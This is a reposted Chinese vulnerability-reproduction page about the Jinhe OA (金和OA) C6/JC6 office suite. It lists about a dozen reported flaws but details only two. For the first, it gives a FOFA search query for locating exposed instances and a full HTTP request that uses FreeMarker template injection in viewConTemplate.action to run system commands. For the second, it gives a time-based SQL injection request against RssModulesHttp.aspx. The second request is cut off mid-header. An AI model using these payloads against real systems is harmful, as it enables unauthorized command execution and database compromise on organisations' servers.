漏洞复现-金和OA系列
漏洞复现-金和OA系列
- 🗡金和OA jc6 RCE
- 金和OA GetTreeDate.aspx SQL注入
- 【新】金和OA RssModulesHttp.aspx接口SQL注入漏洞复现
- C6-GetSgIData.aspx SQL注入
- 金和OA C6 GetTreeDate.aspx SQL注入
- 金和OA C6 GetTreeDate.aspx未授权
- 金和OA JC6 OfficeServer 任意文件上传漏洞
- 金和配置文件
- C6协同管理平台未授权
- jc6 存在任意⽂件上传
- 金和 clobfield 存在sql注入
- 漏洞复现 金和OA EditMain.aspx未授权任意文件上传漏洞(未公开)
- 漏洞复现|金和OA后台存在写入漏洞
🗡金和OA jc6 RCE
https://mp.weixin.qq.com/s/8VTorC_boGqtYk7qlsHyNg
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。金和OA viewConTemplate.action存在远程命令执行漏洞。
app=“金和网络-金和OA”||body=“/jc6/platform/sys/login”
POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Length: 152
Content-Type: application/x-www-form-urlencoded
moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1
请联系厂家 http://www.jinher.com/升级
金和OA GetTreeDate.aspx SQL注入
【新】金和OA RssModulesHttp.aspx接口SQL注入漏洞复现
https://mp.weixin.qq.com/s/RM0gZfnSs4hsGa6MerqDog
GET /C6/JHSoft.Web.WorkFlat/RssModulesHttp.aspx/?interfaceID=-1;WAITFOR+DELAY+%270:0:3%27-- HTTP/1.1
Host:
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML
原文地址:https://blog.csdn.net/qq_33608000/article/details/136715288
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!